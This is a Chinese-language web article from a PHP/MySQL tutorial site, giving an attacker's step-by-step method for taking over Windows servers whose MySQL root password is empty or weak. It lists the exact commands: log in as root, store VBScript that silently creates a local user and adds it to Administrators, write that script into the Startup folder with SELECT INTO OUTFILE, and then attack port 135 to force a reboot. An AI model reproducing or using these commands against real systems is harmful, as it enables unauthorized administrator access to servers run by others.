php开源嘛
首页 | English | MySql数据库 | Php编程 | 建站杂烩 | 系统服务器 | 资源共享 | 专题 | 才桀网 | 支持论坛
  当前位置:主页>MySql数据库>文章内容
MYSQL用户root密码为弱口令的攻击解析...
来源:收集整理 作者:本站整理 发布时间:2007-10-15  

MYSQL用户root密码为弱口令的攻击解析...

    前天,我发了一张关于MYSQL用户ROOT密码为空的贴,在网上我也找到一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了?   phpma.com

  后来,自己思索想到一个办法,在我测试的几台有此漏洞的机中均获得了成功,现将我的攻击方法公布如下:  phpma.com  

  1、连接到对方MYSQL 服务器

  mysql -u root -h 192.168.0.1  phpma.com

  mysql.exe 这个程序在你安装了MYSQL的的BIN目录中   

  2、让我们来看看服务器中有些什么数据库

  mysql>show databases;

  MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。   

  3、让我们进入数据库

  mysql>use test;  phpma.com

  我们将会进入test数据库中   

  4、查看我们进入数据库中有些什么数据表

  mysql>show tables;

  默认的情况下,test中没有任何表的存在。

  以下为关键的部分   

  5、在TEST数据库下创建一个新的表;

  mysql>create table a (cmd text);

  好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。   

  6、在表中插入内容  phpma.com

  mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

  mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

  mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

  注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!   

  7、好了,现在我们来看看表a中有些什么

  mysql>select * from a;

  我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步   

  8、输出表为一个VBS的脚本文件  phpma.com

  mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";

  我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“\"符号。   

  9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。


(阅读次数:
上一篇:服务器的合租与虚拟主机的对比与解释   下一篇:PHP如何连接ORACLE数据库?
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论
  热点文章
·用于SELECT和WHERE子句的SQL函数
·MySQL索引分析和优化
·MySQL数据库下.frm .MYD .MYI损
·怎么删除MySQL数据库中的重复数
·MySQL数据导入与导出
·MySQL数据库中SQL查询语句精华
·如何优化MySQL数据库性能
·MySQL查询优化之查询优化器
·怎么备份MySQL数据库
·如何导入导出*.sql文件到MySQL数
·MySQL数据导入导出方法与工具介
·MySQL索引分析和优化加速网站访
  相关文章
·MySQL数据库中load data local安
·MySQL数据库中的编码问题的经验
·MySQL导入导出大量数据的程序实
·MySQL 数据库引擎快速指南...
·MySQL数据库中中文模糊检索问题.
·MySQL数据库用调用info()函数...
·MySQL数据库中Show命令用法
·关于MySQL数据库中的结果字符串.
·1067错误:MySQL 服务无法启动系
·优化MySQL数据库性能的N大巧方法
·了解公共MySQL的数据库服务器层.
·怎样用MySQL和PHP创建XML

关于我们 | 本站声明 | 友情连接 | 诚邀加盟 | 网站地图
版权Power by DedeCms   技术支持QQ =>> 罗江游鱼   Jacking  后台登陆
Copyright @ 2007 公司地址:柳州市东环路268号 邮编:545006 电话:15920389818 桂ICP备07006725号